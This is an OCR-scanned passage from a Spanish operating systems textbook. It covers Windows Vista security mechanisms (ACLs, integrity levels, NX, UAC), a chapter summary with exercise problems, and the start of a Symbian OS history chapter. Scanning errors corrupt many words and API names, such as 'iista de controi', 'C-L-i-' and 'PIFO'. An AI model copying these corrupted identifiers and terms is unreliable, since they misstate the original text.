tantes se listan en la figura 11-49. Para crear un descriptor de seguridad, primero se asigna almace¬ 
namiento para él y después se inicializa mediante initiaiizeSecunityoescriptor. Esta llamada 
llena el encabezado. Si no se conoce el SID del propietario, se puede buscar por nombre mediante 
LookupAccountsid. Después se puede insertar en el descriptor de seguridad. Lo mismo se aplica pa¬ 
ra el SID de grupo, si lo hay. Por lo general, éstos serán el propio SID del que hizo la llamada y uno 
de sus grupos, pero el administrador del sistema puede llenar cualquier SID. 
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Función de API Win32 

Descripción 

InitializeSecurityDescriptor 

Preparar para su uso un nuevo descriptor 

LookupAccountSid 

Buscar el SID para un nombre de usuario dado 

SetSecurityDescriptorOwner 

Introducir el SID de propietario en el descriptor de seguridad 

SetSecurityDescriptorGroup 

Introducir el SID de grupo en el descriptor de seguridad 

InitializeAcI 

Inicializar DACL o SACL 

AddAccessAI lowedAce 

Agregar nuevo ACE a un DACL o SACL para permitir el acceso 

AddAccessDeniedAce 

Agregar nuevo ACE a un DACL o SACL para negar acceso 

DeleteAce 

Eliminar un ACE de un DACL o SACL 

SetSecurityDescriptorDacI 

Adjuntar un DACL a un descriptor de seguridad 


Figura 11-49. Las principales funciones de seguridad de API Win32 


En este punto, la DACL (o SACL) del descriptor de seguridad se puede inicializar con ini- 
tiaiizeAci. Se pueden agregar entradas en laACL mediante el uso de AddAccessAiiowedAce y au- 
dAccessDeniedAce. Estas llamadas se pueden repetir varias veces para agregar todas las entradas 
en la ACE que se necesiten. oeieteAce se puede utilizar para eliminar una entrada: es decir, cuan¬ 
do se modifica unaACL existente en vez de construir una nueva. Cuando laACL está lista, se pue¬ 
de utilizar setsecurityDescriptorDaci para unirla al descriptor de seguridad. Por último, cuando 
se crea el objeto, el descriptor de seguridad nuevo se puede pasar como parámetro para unirlo al 
objeto. 

11.9.3 I mplementación de la seguridad 

La seguridad en un sistema Windows Vista independiente se implementa mediante varios compo¬ 
nentes, la mayoría de los cuales ya hemos visto (las redes son toda una historia que está más allá 
del alcance de este libro). El inicio de sesión se maneja mediante winlogon y la autenticación me¬ 
diante Isass. El resultado de un inicio de sesión exitoso es un nuevo shell de GUI explorer.exe con 
su token de acceso asociado. Este proceso utiliza los grupos masivos de archivos SECURITY y 
SAM en el registro. El primer grupo masivo de archivos establece la directiva de seguridad gene¬ 
ral y el segundo contiene la información de seguridad para los usuarios individuales, como vimos 
en la sección 11.2.3. 

U na vez que un usuario inicia sesión, se realizan operaciones de seguridad cuando abre un ob¬ 
jeto para utilizarlo. Cada llamada openxxx requiere que se abra el nombre del objeto y el conjunto 
de permisos. Durante el procesamiento de la apertura, el monitor de referencia de seguridad (vea la 
figura 11-13) comprueba si el proceso que hace la llamada tiene todos los permisos requeridos. Pa¬ 
ra real izar esta comprobación, analiza el token de acceso del proceso que hizo la llamada y la DACL 
asociada con el objeto. Recorre la lista deACEs en laACL por orden. Al momento de encontrar una 
entrada que coincida con el SID del proceso que hizo la llamada o con uno de sus grupos, el acce¬ 
so que se encuentra ahí se toma como definitivo. Si todos los permisos que necesita el proceso que 
hizo la llamada están disponibles, la operación de apertura tiene éxito; en caso contrario fracasa. 

Las DA CLs tienen entradas Denegar y entradas Permitir, como hemos visto. Por esta razón es 
común colocar las entradas para denegar el acceso en frente de las entradas que otorgan el acceso 
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en la A CL, de manera que un usuario al que se le niegue el acceso de manera específica no pueda 
entrar por medio de una puerta trasera, al ser un miembro de un grupo que tenga acceso legítimo. 

Una vez abierto un objeto, se devuelve un mane]ador para el mismo al proceso que hizo la lla¬ 
mada. En las siguientes llamadas sólo se comprueba si la operación intentada está en el conjunto de 
operaciones solicitadas al momento de abrir el objeto, para evitar que un proceso abra un archivo 
para lectura y después trate de escribir en él. Además, las llamadas en los manejadores pueden pro¬ 
ducir entradas en los registros de auditoría, como lo requiere la SACL. 

Windows Vista agregó otra herramienta de seguridad para lidiar con los problemas comunes al 
asegurar el sistema medianteACLs. Hay nuevos SI Dsde nivel de integridad obligatorios en el to- 
ken del proceso, y los objetos especifican una ACE de nivel de integridad en la SACL. El nivel de 
integridad evita el acceso de escritura a los objetos, sin importar quéACEs haya en la DACL. En 
especial, el esquema de nivel de integridad se utiliza para protegerse contra un proceso de Internet 
Explorer que haya sido comprometido por un atacante (tal vez el usuario mal aconsejado haya des¬ 
cargado código de un sitio Web desconocido). El lE con nivel bajo de permisos, como se le lla¬ 
ma, se ejecuta con un nivel de integridad bajo. De manera predeterminada, todos los archivos y 
claves del registro en el sistema tienen un nivel de integridad medio, por lo que el lE que se ejecu¬ 
ta con un nivel de integridad bajo no puede modificarlos. 

En los últimos años se han agregado unas cuantas características más de seguridad a Win¬ 
dows. Para el Service Pack 2 de Windows X P, la mayor parte del sistema se compilaba con una 
bandera (/GS) que realizaba una validación contra muchos tipos de desbordamientos del búfer 
de la pila. Además se utilizaba una herramienta en la arquitectura AM D64, conocida como NX, 
para limitar la ejecución del código en las pilas. El bit NX en el procesador está disponible inclu¬ 
so al ejecutarse en modo x86. NX significa no ejecutar y permite marcar páginas para que no se 
pueda ejecutar código desde ellas. Así, si un atacante utiliza una vulnerabilidad de desbordamien¬ 
to de búfer para insertar código en un proceso, no es tan fácil saltar al código y empezar a ejecu¬ 
tarlo. 

Windows Vista introdujo aún más características de seguridad para frustrar a los atacantes. El 
código que se carga en modo de kernel se comprueba (de manera predeterminada en los sistemas 
x64) y sólo se carga si está firmado de manera apropiada. Las direcciones en las que se cargan los 
DLLsyEXEs(y también las asignaciones de la pila) se revuelven mucho en cada sistema, para que 
sea menos probable que un atacante pueda utilizar con éxito los desbordamientos de búfer para bi- 
furcar hacia una dirección conocida y empezar a ejecutar secuencias de código que pueden provo¬ 
car que se eleven los privilegios. Así se podrá atacar una fracción mucho menor de sistemas con 
base en el método de confiar en que los binarios estén en direcciones estándar. Es mucho más pro¬ 
bable que los sistemas sólo fallen, con lo cual un potencial ataque de elevación se convierte en un 
ataque de negación de servicio, que es menos peligroso. 

Otro de los cambios fue la introducción de lo que M icrosoft denomina UAC (U ser Account 
Control, Control de cuentas de usuario). Esto es para lidiar con el problema crónico en Windows, 
en donde la mayoría délos usuarios utilizan el equipo como administradores. El diseño de Windows 
no requiere que los usuarios operen como administradores, pero la negligencia durante muchas ver¬ 
siones ha provocado que sea casi imposible utilizar Windows si el usuario no es un administrador. 
Es peligroso ser administrador todo el tiempo. Los errores del usuario no sólo pueden dañar el sis¬ 
tema: también si el usuario es engañado o atacado de alguna forma, y ejecuta código que trate de 
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comprometer el sistema, el código tendrá acceso administrativo y se puede enterrar a sí mismo en 
un nivel muy profundo en el sistema. 

Con el UAC, si se intenta realizar una operación que requiera acceso de administrador, el sis¬ 
tema superpone un escritorio especial y toma el control, de manera que sólo la entrada del usuario 
pueda autorizar el acceso (algo parecido a la forma en que funciona CTRL-ALT-SUPR para la se¬ 
guridad C2). Desde luego que, sin convertirse en administrador es posible que un atacante destru¬ 
ya lo que realmente le importa al usuario: sus archivos personales. No obstante, el UAC ayuda a 
frustrar los tipos existentes de ataques, y siempre es más fácil recuperar un sistema comprometido 
si el atacante no pudo modificar ninguno de los archivos de datos del sistema. 

La última característica de seguridad en Windows Vista es una que ya hemos mencionado. Hay 
soporte para crear procesos protegidos, los cuales proveen un límite de seguridad. Por lo general, el 
usuario (según su representación mediante un objeto de token) define el límite de privilegios en 
el sistema. Cuando se crea un proceso, el usuario tiene acceso al proceso por medio de cualquier 
cantidad de herramientas del kernel para crear procesos, depurar, nombres de rutas, inyección de 
hilos, etcétera. Los procesos protegidos se desconectan del acceso del usuario. El único uso de es¬ 
ta herramienta en Vista es para permitir que el software de Administración de los derechos digita¬ 
les proteja mejor el contenido. Tal vez el uso de procesos protegidos se expandirá en versiones 
futuras para fines más amigables al usuario, como proteger el sistema contra atacantes, en vez de 
proteger el contenido contra los ataques del propietario del sistema. 

Los esfuerzos de M icrosoft por mejorar la seguridad de Windows se han acelerado en años re¬ 
cientes, a medida que se lanzan cada vez más ataques contra los sistemas en todo el mundo. A Igu- 
nos de estos ataques han tenido mucho éxito al desconectar países y empresas importantes de 
Intérnete incurrir en costos de mi les de mil Iones de dólares. La mayoría de los ataques explotan pe¬ 
queños errores de código que producen desbordamientos del búfer, con lo cual el atacante puede in¬ 
sertar código al sobrescribir las direcciones de retorno, los apuntadores a excepciones y demás datos 
que controlan la ejecución délos programas. M uchos de estos problemas se podrían evitar si se uti¬ 
lizaran lenguajes con seguridad de tipos en vez de C y C-L-i-. E incluso con estos lenguajes insegu¬ 
ros, se podrían evitar muchas vulnerabilidades si los estudiantes estuvieran mejor capacitados para 
comprender los riesgos de la validación de los parámetros y datos. Después de todo, muchos de los 
ingenieros de software que escriben código en M icrosoft fueron estudiantes unos años antes, justo 
igual que muchos de ustedes que leen este caso de estudio ahora. Hay muchos libros disponibles 
sobre los tipos de pequeños errores de codificación que pueden explotarse en los lenguajes basados 
en apuntadores, y cómo evitarlos (por ejemplo, Howard y LeBlank, 2007). 


11.10 RESUMEN 

El modo de kernel en Windows Vista está estructurado en el HAL, en los niveles del kernel y del 
ejecutivo de NTOS, y en un gran número de drivers de dispositivos que implementan todo, desde 
los servicios de dispositivos hasta los sistemas de archivos, las redes y los gráficos. EL HAL ocul¬ 
ta ciertas diferencias en el hardware de los demás componentes. El nivel del kernel administra las 
CPUs para posibilitar la operación multihilo y la sincronización, y el ejecutivo implementa la ma¬ 
yoría de los servicios en modo de kernel. 
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El ejecutivo se basa en los objetos en modo de kernel que representan las estructuras de datos 
clave del ejecutivo, incluyendo los procesos, hilos, secciones de memoria, drivers, dispositivos y 
objetos de sincronización, por mencionar unos cuantos. Para crear objetos, los procesos de usuario 
llaman a los servicios del sistema y obtienen referencias a manejadoras, que se pueden utilizar en 
las siguientes llamadas al sistema para los componentes del ejecutivo. El sistema operativo también 
crea objetos de manera interna. El administrador de objetos mantiene un espacio de nombre, en el 
que los objetos se pueden insertar para buscarlos después. 

Los objetos más importantes en Windows son los procesos, los hilos y las secciones. Los pro¬ 
cesos tienen espacios de direcciones virtuales y son contenedores de recursos. Los hilos son la uni¬ 
dad de ejecución; se programan en el nivel del kernel mediante el uso de un algoritmo de prioridad 
en el que el hilo listo de mayor prioridad siempre se ejecuta, reemplazando los hilos de menor prio¬ 
ridad según sea necesario. Las secciones representan objetos de memoria como los archivos, que se 
pueden asignar en los espacios de direcciones de los procesos. Las imágenes de los programas EX E 
y DLL se representan como secciones, al igual que la memoria compartida. 

Windows proporciona memoria virtual con paginación bajo demanda. El algoritmo de pagina¬ 
ción se basa en el concepto de conjunto de trabajo. El sistema mantiene varios tipos de listas de pá¬ 
ginas, para optimizar el uso de la memoria. Para alimentar las diversas listas de páginas, se recortan 
los conjuntos de trabajo mediante el uso de fórmulas complejas que tratan de reutilizar las páginas 
físicas a las que no se haya hecho referencia en mucho tiempo. El administrador de la caché mane¬ 
ja las direcciones virtuales en el kernel que se pueden utilizar para asignar archivos en la memoria, 
con lo cual se mejora en forma dramática el rendimiento de las operaciones de E/S para muchas 
aplicaciones, debido a que las operaciones de lectura se pueden satisfacer sin necesidad de acceder 
al disco. 

Las operaciones de E/S se realizan mediante los drivers de dispositivos, los cuales siguen el 
M odelo de drivers de Windows. Cada driver empieza por inicializar un objeto de driver que contie¬ 
ne las direcciones de los procedimientos que el sistema puede llamar para manipular los dispositi¬ 
vos. Los dispositivos reales se representan mediante objetos de dispositivo, que se crean a partir de 
la descripción de configuración del sistema o mediante el administrador de plug-and-play, a medi¬ 
da que vaya descubriendo los dispositivos al enumerar los buses del sistema. Los dispositivos se 
apilan y los paquetes de peticiones de E/S se pasan hacia abajo por la pila, para que los drivers atien¬ 
dan esas peticiones para cada dispositivo en la pila de dispositivos. La E/S es asincrona en forma 
inherente, y los drivers por lo común ponen en cola las peticiones para seguir trabajando y regresar 
al proceso que los llamó. Los volúmenes del sistema de archivos se implementan como dispositi¬ 
vos en el sistema de E/S. 

El sistema de archivos NTFS se basa en una tabla de archivos maestra, la cual tiene un re¬ 
gistro por cada archivo o directorio. Todos los metadatos en un sistema de archivos NTFS son 
en sí parte de un archivo NTFS. Cada archivo tiene varios atributos, que pueden estar en un re¬ 
gistro de la M FT o pueden ser no residentes (se almacenan en bloques fuera de la M FT). NTFS 
acepta U nicode, compresión, registros de transacciones y cifrado, entre muchas otras caracterís¬ 
ticas. 

Por último, Windows Vista tiene un sofisticado sistema de seguridad basado en listas de con¬ 
trol de acceso y niveles de integridad. Cada proceso tiene un token de autenticación que indica la 
identidad del usuario y los privilegios especiales que tiene el proceso, si acaso. 
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Cada objeto tiene asociado un descriptor de seguridad. Este descriptor apunta a una iista de 
controi de acceso discrecionai que contiene entradas de controi de acceso, ias cuaies pueden permi¬ 
tir o denegar ei acceso a individuos o grupos. Windows agregó numerosas características de segu¬ 
ridad en sus versiones más recientes, inciuyendo Bitiocker para cifrar voiúmenes enteros, ios 
espacios de direcciones aieatorios, ias piias no ejecutabies y otras medidas para dificuitar más ios ata¬ 
ques de desbordamiento dei búfer. 


PROBLEMAS 

1. El HAL lleva un registro del tiempo que comienza en 1601. M uestre un ejemplo de una aplica¬ 
ción donde esta característica sea útil. 

2. En la sección 11.3.2 analizamos los problemas que ocasionan las aplicaciones multihilo al ce¬ 
rrar manejadoras en un hilo mientras se siguen utilizando en otro. Una posibilidad de corregir 
esto sería insertar un campo de secuencia. ¿Cómo podría ser de ayuda? ¿Qué cambios se reque¬ 
rirían en el sistema? 

3. Win32 no tiene señales. Si se introdujeran, podrían ser por proceso, por hilo, de ambos tipos o 
de ninguno. Haga una proposición y explique por qué es una buena idea. 

4. U na alternativa al uso de DLLs es vincular de manera estática cada programa con los procedi¬ 
mientos de biblioteca precisos que va a llamar, ni más ni menos. Si se introdujera este sistema, 
¿tendría más sentido en las máquinas clientes o en las máquinas servidores? 

5. ¿Cuáles son algunas razones por las que un hilo tiene pilas separadas para el modo de usuario 
y el modo de kernel en Windows? 

6 . Windows utiliza páginas de4 M B debido a que mejora la efectividad del TLB, que puede tener 
un profundo impacto en el rendimiento. Explique por qué. 

7. ¿Hay algún límite en cuanto al número de operaciones distintas que se pueden definir en un ob¬ 
jeto del ejecutivo? De ser así, ¿de dónde proviene este límite? En caso contrario, ¿por qué no? 

8 . La llamada waitForMuitipieObjects de laAPI Win32 permite bloquear un hilo en un conjun¬ 
to de objetos de sincronización, cuyos manejadores se pasan como parámetros. Tan pronto como 
se señala uno de ellos, se libera el hilo que hizo la llamada. ¿Es posible que el conjunto de obje¬ 
tos de sincronización incluya dos semáforos, un mutex y una sección crítica? ¿Por qué sí o por 
qué no? Sugerencia: Ésta no es una pregunta engañosa, pero hay que analizarla con cuidado. 

9. Nombre tres razones por las que se podría terminar un proceso. 

10. Como vimos en la sección 11.4, hay una tabla de manejadores especiales que se utiliza para 
asignar IDs para los procesos e hilos. Los algoritmos para manejar tablas por lo general asig¬ 
nan el primer manejador disponible (y mantienen la lista libreen orden LIFO). En versiones re¬ 
cientes de Windows esto cambió para que la tabla de IDs siempre mantenga la lista libre en 
orden PIFO. ¿Cuál es el problema que puede llegar a ocasionar el orden FIFO para asignar IDs 
de procesos, y por qué UNIX no tiene este problema? 

11. Suponga que el quantum se establece en 20 mseg y que el hilo actual, con prioridad de 24, aca¬ 
ba de empezar un quantum. De repente se completa una operación de E/S y un hilo con priori- 
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dad de 28 pasa al estado listo. ¿Cuánto tiempo aproximado tiene que esperar para poder ejecu¬ 
tarse en la CPU? 

12. En Windows Vista, laprioridad actual siempre es mayor o igual que la prioridad base. ¿Hay al¬ 
guna circunstancia en la que tendría sentido que la prioridad actual fuera menor que la priori¬ 
dad base? De ser así, muestre un ejemplo. En caso contrario, ¿por qué no? 

13. En Windows fue fácil implementar una herramienta en donde los hilos que se ejecutan en el ker- 
nel puedan unirse de manera temporal al espacio de direcciones de un proceso distinto. ¿Porqué 
es tan difícil implementar esto en modo de usuario? ¿Por qué podría ser interesante hacerlo? 

14. Aun cuando haya mucha memoria libre disponible y el administrador de memoria no necesite 
recortar los conjuntos de trabajo, el sistema de paginación puede estar escribiendo con frecuen¬ 
cia en el disco. ¿Por qué? 

15. ¿Por qué la autoasignación que se utiliza para acceder a las páginas físicas del directorio de pá¬ 
ginas y las tablas de páginas para un proceso siempre ocupa los mismos 4 M B de direcciones 
virtuales del kernel (en el x86)? 

16. Si una región de espacio de direcciones virtuales está reservada pero no confirmada, ¿cree us¬ 
ted que se crea un VAD para ella? Argumente su respuesta. 

17. ¿Cuál de las transiciones mostradas en la figura 11-36 son decisiones de directivas, en contras¬ 
te a los movimientos requeridos forzados por los eventos del sistema (por ejemplo, un proceso 
que termina y libera sus páginas)? 

18. Suponga que se comparte una página en dos conjuntos de trabajo a la vez. Si se desaloja de uno 
de los conjuntos de trabajo, ¿a dónde va en la figura 11-36? ¿Q ué ocurre cuando se desaloja del 
segundo conjunto de trabajo? 

19. Cuando un proceso desasigna una página de la pila de páginas limpias, realiza la transición (5) 
en la figura 11-36. ¿A dónde va una página de la pila de páginas sucias cuando se desasigna? 
¿Por qué no hay transición a la lista de páginas modificadas cuando se desasigna una página de 
la pila de páginas sucias? 

20. Suponga que un objeto despachador que representa cierto tipo de bloqueo exclusivo (como un 
mutex) se marca para utilizar un evento de notificación en vez de un evento de sincronización, 
para anunciar que se ha liberado el bloqueo. ¿Por qué sería esto malo? ¿Cuánto dependería la 
respuesta de los tiempos de retención del bloqueo, la longitud del quantum y si el sistema es 
multiprocesador o no? 

21. U n archivo tiene la siguiente asignación. M uestre las entradas de las ejecuciones en la M FT. 

Desplazamiento 0123456789 10 
Dirección de disco 50 51 52 22 24 25 26 53 54 - 60 

22. Considere el registro de la M FT de la figura 11-43. Suponga que creció el archivo y se asignó 
un décimo bloque al final del mismo. El número de este bloque es 66. ¿Cómo se vería ahora el 
registro de la M FT? 

23. En la figura ll-46(b), las primeras dos ejecuciones tienen una longitud de 8 bloques cada una. 
¿Es sólo un accidente el que sean iguales o tiene esto que ver con la forma en que funciona la 
compresión? Explique su respuesta. 
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24. Suponga que desea crear Windows Vista Lite. ¿Qué campos de ia figura 11-47 se podrían eii- 
minar sin debiiitar ia seguridad dei sistema? 

25. Un modeio de extensión que utiiizan muchos programas (navegadores Web, Office, servidores 
COM ) impiica ei hospedaje de DLLs para enganchar y extender su funcionaiidad subyacente. 
¿Es éste un modeio razonabie para usar un servicio basado en RPC siemprey cuando tenga cui¬ 
dado en hacerse pasar por ios ciientes antes de cargar ei DLL? ¿Por qué no? 

26. Ai ejecutarse en una máquina NU M A, cada vez que ei administrador de memoria de Windows 
necesita asignar una página física para manejar un faiio de página, trata de usar una página dei 
nodo NUM A para ei procesador ideai dei hiio actuai. ¿Por qué? ¿Qué pasa si ei hiio se ejecuta 
actuaimente en un procesador distinto? 

27. M uestre un par deejempiosen donde una apiicación se podría recuperar con faciiidad de un res- 
paido basado en ia copia sombra de un voiumen, en vez de usar ei estado dei disco después de 
un faiio dei sistema. 

28. En ia sección 11.9, ia provisión de nueva memoria ai montícuio dei proceso se mencionó como 
uno de ios casos que requieren un suministro de páginas en ceros para poder satisfacer ios re¬ 
querimientos de seguridad. M uestre uno o más ejempios de operaciones de memoria virtuai que 
requieran páginas en ceros. 

29. Ei comando regedit se puede utiiizar para exportar una parte o todo ei registro a un archivo de 
texto, en todas ias versiones actuaies de Windows. Guarde ei registro varias veces durante una 
sesión de trabajo y vea qué es io que cambia. Si tiene acceso a una computadora con Windows 
en ia que pueda instaiar software o hardware, descubra qué es io que cambia cuando se agrega 
o eiimina un programa o dispositivo. 

30. Escriba un programa de UNIX que simule la escritura de un archivo NTFS con varios flujos. 
Debería aceptar una lista de uno o más archivos como argumentos y escribir un archivo de sa¬ 
lida que contenga un flujo con los atributos de todos los argumentos, y flujos adicionales con el 
contenido de cada uno de los argumentos. Ahora escriba un segundo programa para reportar los 
atributos y flujos, y extraer todos los componentes. 
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En los dos capítulos anteriores examinamos dos sistemas operativos populares en equipos de escri¬ 
torio y portátiles: Linux y Windows Vista. Sin embargo, más de 90% de las CPUs en el mundo no 
están en equipos de escritorio o en portátiles. Se encuentran en sistemas embebidos o Incrustados 
entre los cuales están los teléfonos celulares, PDAs, cámaras digitales, cámaras de video, máquinas 
de juegos, IPods, reproductores M P3, reproductores de CD, grabadoras de DVD, enrutadores Ina¬ 
lámbricos, televisiones, receptores deGPS, Impresoras láser, autosy muchos más productos para el 
consumidor. La mayoría de ellos utilizan chips modernos de 32 y 64 bits, y casi todos ejecutan un 
sistema operativo completo. En este capítulo analizaremos con más detalle un sistema operativo po¬ 
pular en el mundo de los sistemas Incrustados: Symblan OS. 

Este sistema operativo se ejecuta en plataformas móviles de "teléfonos Inteligentes" de varios 
fabricantes distintos. Los teléfonos Inteligentes tienen ese nombre debido a que ejecutan sistemas 
operativos completos y utilizan las características de las computadoras de escritorio. Symblan OS 
está diseñado de tal forma que pueda ser la base de una amplia variedad de teléfonos Inteligentes de 
varios fabricantes. Se diseñó con cuidado para ejecutarlo de manera específica en plataformas de te¬ 
léfonos Inteligentes: computadoras de propósito general con una CPU, memoria y capacidad de al¬ 
macenamiento limitados, con un enfoque hacia la comunicación. 

Nuestro análisis de Symblan OS empezará con su historia. Después proporcionaremos las ge¬ 
neralidades del sistema para que el lector se dé una Idea de cómo está diseñado y los usos para los 
que lo tenían destinado sus diseñadores. A continuación examinaremos los diversos aspectos del di¬ 
seño de Symblan OS, como lo hicimos con respecto a Linux y Windows: analizaremos los proce¬ 
sos, la administración de la memoria, las operaciones de E/S, el sistema de archivos y la seguridad. 
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Concluiremos con un análisis sobre la forma en que Symbian OS maneja la comunicación en los 
teléfonos celulares. 

12.1 LA HISTORIA DE SYMBIAN OS 

En términos del desarrollo de las computadoras en general, UNIX tiene una historia antigua: Win¬ 
dows tiene una historia moderadamente larga. Por otra parte, Symbian tiene una historia bastante 
corta. Sus raíces están en los sistemas que se desarrollaron en la década de 1990, y su debut fue en 
el 2001. Esto no debería sorprender, ya que la plataforma de los teléfonos inteligentes en la que se 
ejecuta Symbian OS también evolucionó desde hace poco. 

Symbian OS tiene sus raíces en los dispositivos de bolsillo y se ha desarrollado con rapidez a 
través de varias versiones. 

12.1.1 Raíces de Symbian OS: Psion y EPOC 

La herencia de Symbian OS empieza con algunos de los primeros dispositivos de bolsillo: éstos 
evolucionaron, a finales de la década de 1980, como un medio para comprimir la utilidad de un dis¬ 
positivo de escritorio en un pequeño paquete portátil. Los primeros intentos de las computadoras de 
bolsillo no fueron recibidos con mucho entusiasmo: la A pple Newton era un dispositivo bien dise¬ 
ñado, pero tuvo sólo unos cuantos usuarios. A pesar de este lento inicio, las computadoras de bol¬ 
sillo desarrolladas a mediados de 1990 estaban mejor adaptadas al usuario y a la forma en que las 
personas utilizaban los dispositivos móviles. Este tipo de computadoras se diseñaron en un principio 
como PD A s (asistentes digitales personales que en esencia eran planificadores electrónicos), pero evo¬ 
lucionaron para abarcar muchos tipos de funcionalidad. A medida que se desarrollaron, empezaron a 
funcionar como las computadoras de escritorio y también tenían las mismas necesidades, como la 
multitarea: incorporaron capacidades de almacenamiento en varias formas: tenían que ser flexibles 
en las áreas de la entrada y salida de datos. 

Los dispositivos de bolsillo también crecieron para abarcar la comunicación. A medida que 
iban creciendo estos dispositivos personales, también se desarrollaba la comunicación personal. Los 
teléfonos móviles tuvieron un notable incremento en su uso a finales de la década de 1990. Por en¬ 
de, era natural fusionar los dispositivos de bolsillo con los teléfonos móviles para formar los teléfo¬ 
nos inteligentes. Se tuvieron que desarrollar los sistemas operativos que operaban a los dispositivos 
inteligentes a medida que se realizó esta fusión. 

En la década de 1990, Psion Computers fabricaba dispositivos que eran PDAs. En 1991, Psion 
produjo la Serie 3: una pequeña computadora con una pantalla monocromática que tenía una reso¬ 
lución equivalente a la mitad de VGA y cabía en un bolsillo. Después de la Serie 3 salió la Serie 3c 
en 1996, con capacidad infrarroja adicional, y la Serie 3mx en 1998, con un procesador más veloz 
y más memoria. Cada uno de estos dispositivos tuvo mucho éxito, en gran parte debido a la buena 
administración de energía y la interoperabilidad con otras computadoras, incluyendo las PCsy otros 
dispositivos de bolsillo. La programación se basaba en el lenguaje C, tenía un diseño orientado a 
objetos y empleaba motores de aplicaciones, una parte distintiva del desarrollo de Symbian OS. 
Esta metodología de los motores era una poderosa característica. Se basaba en el diseño del micro- 
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kernel para enfocar la funcionalidad en los motores (funcionaban como servidores) que administra¬ 
ban las funciones en respuesta a las peticiones de las aplicaciones. Esta metodología hizo posible la 
estandarización de una A Pl y el uso de la abstracción de objetos para que el programador de apli¬ 
caciones dejara de preocuparse sobre los detalles tediosos como los formatos de datos. 

En 1996, Psion empezó a diseñar un nuevo sistema operativo de 32 bits que aceptaba dispositi¬ 
vos señaladores en una pantalla táctil, utilizaba multimedia y tenía capacidades más completas de co¬ 
municación. El nuevo sistema también estaba más orientado a objetos y podía portarse a distintas 
arquitecturas y diseños de dispositivos. El resultado del esfuerzo de Psion fue la introducción del sis¬ 
tema como EPOC Release 1. Este sistema se programó en C- 1 -- 1 - y estaba diseñado para ser orienta¬ 
do a objetos desde sus cimientos. También utilizó la metodología délos motores y expandió esta idea 
de diseño en una serie de servidores que coordinaban el acceso a los servicios del sistema y los dis¬ 
positivos periféricos. EPOC expandió las posibilidades de comunicación, abrió el sistema operativo 
a la tecnología multimedia, introdujo nuevas plataformas para interconectar elementos como las pan¬ 
tallas táctiles y generalizó la interfaz de hardware. 

EPOC se desarrolló aún más en dos versiones posteriores: EPOC Release 3 (ER3) y EPOC Re¬ 
lease 5 (ER5). Estas versiones se ejecutaban en nuevas plataformas como las computadoras Psion 
Series y Serie 7. 

Psion también buscaba enfatizar las formas en que se podía adaptar su sistema operativo a otras 
plataformas de hardware. Cerca del 2000, la mayoría de las oportunidades para el desarrollo de nuevos 
equipos de bolsillo estaban en el negocio de los teléfonos móviles, donde los fabricantes ya estaban bus¬ 
cando un sistema operativo nuevo y avanzado para su próxima generación de dispositivos. Para apro¬ 
vechar estas oportunidades, Psion y los líderes en la industria de los teléfonos móviles, entre ellos 
Nokia, Ericsson, M otorola y M atshushita (Panasonic), formaron una empresa conjunta llamada Sym- 
bian para que asumiera la propiedad del sistema operativo EPOC y se encargara del futuro desarrollo 
de su núcleo. Este nuevo diseño del núcleo se conoce ahora como Symbian OS. 


12.1.2 Symbian OS versión 6 

Como la última versión de EPOC fue ER5, Symbian OS hizo su debut con la versión 6 en el 2001. 
Este sistema operativo aprovechaba las propiedades flexibles de EPOC y estaba orientado a varias 
plataformas distintas general izadas. Se diseñó con la suficiente flexibilidad para desarrollar una am¬ 
plia variedad de dispositivos móviles y teléfonos avanzados, y al mismo tiempo daba a los fabri¬ 
cantes la oportunidad de diferenciar sus productos. 

También se decidió que Symbian OS adoptara en forma activa las tecnologías actuales de pun¬ 
ta, a medida que se hicieran disponibles. Esta decisión reforzaba las opciones de diseño de orienta¬ 
ción a objetos y una arquitectura cliente-servidor, ya que estas tecnologías se estaban volviendo 
populares en los mundos de las computadoras de escritorio e Internet. 

Los diseñadores de Symbian OS versión 6 lo consideraban un sistema "abierto". Esto era dis¬ 
tinto délas propiedades de "código fuente abierto" que se atribuían a menudo a UNIX y Linux. Con 
el término "abierto", los diseñadores de Symbian OS querían decir que la estructura del sistema 
operativo se publicaba y estaba disponible para todos. Además, se publicaron todas las interfaces 
del sistema para fomentar el diseño de software de terceras partes. 
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12.1.3 Symbian OS versión 7 

La versión 7 de Symbian OS era muy parecida a sus predecesores EPOC y ia versión 6 en cuanto 
a diseño y función. Ei enfoque en ei diseño era abarcar ia teiefonía móvii. Sin embargo, a medida 
que cada vez más fabricantes diseñaban teiéfonos móviies, era obvio que hasta ia fiexibiiidad de 
EPOC, un sistema operativo para dispositivos de boisiiio, no podría iidiar con ia piétora de nuevos 
teiéfonos que necesitaban usar Symbian OS. 

La versión 7 de Symbian OS mantenía ia funcionaiidad de escritorio de EPOC, pero ia ma¬ 
yoría de ios aspectos internos dei sistema se rediseñaron para abarcar muchos tipos de funciona¬ 
iidad de ios teiéfonos inteiigentes. Ei kernei y ios servicios dei sistema operativo se separaron de 
ia interfaz de usuario. En ia nueva versión se podía ejecutar ei mismo sistema operativo en mu¬ 
chas piataformas distintas de teiéfonos inteiigentes, cada una de ias cuaies utiiizaba un sistema 
distinto de interfaz de usuario. Ahora Symbian OS se podía extender para iidiar, por ejempio, con 
ios nuevos formatos no pronosticados de mensajería, o se podía utiiizar en distintos teiéfonos in¬ 
teiigentes que utiiizaran distintas tecnoiogías teiefónicas. La versión 7 de Symbian OS se iiberó 
en ei 2003. 


12.1.4 Symbian OS en la actualidad 

La versión 7 de Symbian OS fue muy importante, debido a que en eiia se incorporaron ia abstrac¬ 
ción y ia fiexibiiidad ai sistema operativo. Sin embargo, esta abstracción tuvo sus desventajas. En 
poco tiempo, ei rendimiento dei sistema operativo se voivió un probiema que había que resoiver. 

M ás tarde se emprendió un proyecto para reescribir por compieto ei sistema operativo, esta vez 
con énfasis en ei rendimiento. Ei nuevo diseño dei sistema operativo debía retener ia fiexibiiidad de 
ia versión 7 de Symbian OS y, ai mismo tiempo, mejorar ei rendimiento y aumentar ia seguridad 
dei sistema. La versión 8 de Symbian OS, que se iiberó en 2004, mejoró ei rendimiento de Sym¬ 
bian OS, en especiai para sus funciones de tiempo reai. La versión 9 de Symbian OS se iiberó en 
2005; esta versión agregó ios conceptos de seguridad basada en ia capacidad y ia instaiación de un 
guardián. La versión 9 de Symbian OS agregó ia fiexibiiidad para ei hardware que ia versión 7 agre¬ 
gó para ei software. Se desarroiió un nuevo modeio binario que permitía a ios desarroi i adores de 
hardware utiiizar Symbian OS sin tener que rediseñar ei hardware para adaptado a un modeio 
de arquitectura específico. 


